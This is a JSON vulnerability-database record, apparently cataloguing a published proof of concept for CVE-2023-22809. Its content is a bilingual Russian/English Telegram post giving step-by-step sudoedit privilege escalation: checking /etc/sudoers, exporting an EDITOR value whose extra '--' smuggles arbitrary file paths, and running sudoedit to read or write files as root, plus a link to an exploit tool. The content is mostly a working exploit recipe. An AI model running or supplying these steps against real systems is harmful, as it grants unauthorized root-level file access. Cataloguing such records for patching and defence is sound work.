{"uuid": "fd120cd2-d631-46ea-b63c-044f7880b790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-22809", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2756", "content": "Sudoedit Privilege Escalation (CVE-2023-22809)\n\n#RU\n\n\u041f\u0440\u043e\u0432\u0435\u0440\u044c\u0442\u0435, \u0447\u0442\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c sudoedit \n\ncat /etc/sudoers\n\n\u0412\u0432\u0435\u0434\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0434\u044d\u0448, \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043d\u0430\u0448 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root\n \nexport EDITOR='vim -- /path/to/your/files'\n\n\u0422\u0435\u043f\u0435\u0440\u044c \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c/\u043f\u0438\u0441\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u044b \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 root\n\nsudoedit /etc/custom/service.conf\n\n#EN\n\nCheck that you can use sudoedit \n\ncat /etc/sudoers\n\nBy introducing an extra dash, we can make our editor work as root\n \nexport EDITOR='vim -- /path/to/your/files'\n\nNow you can read/write files with root\n\nsudoedit /etc/custom/service.conf\n\nTools:\n\nhttps://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc", "creation_timestamp": "2023-03-06T08:01:41.000000Z"}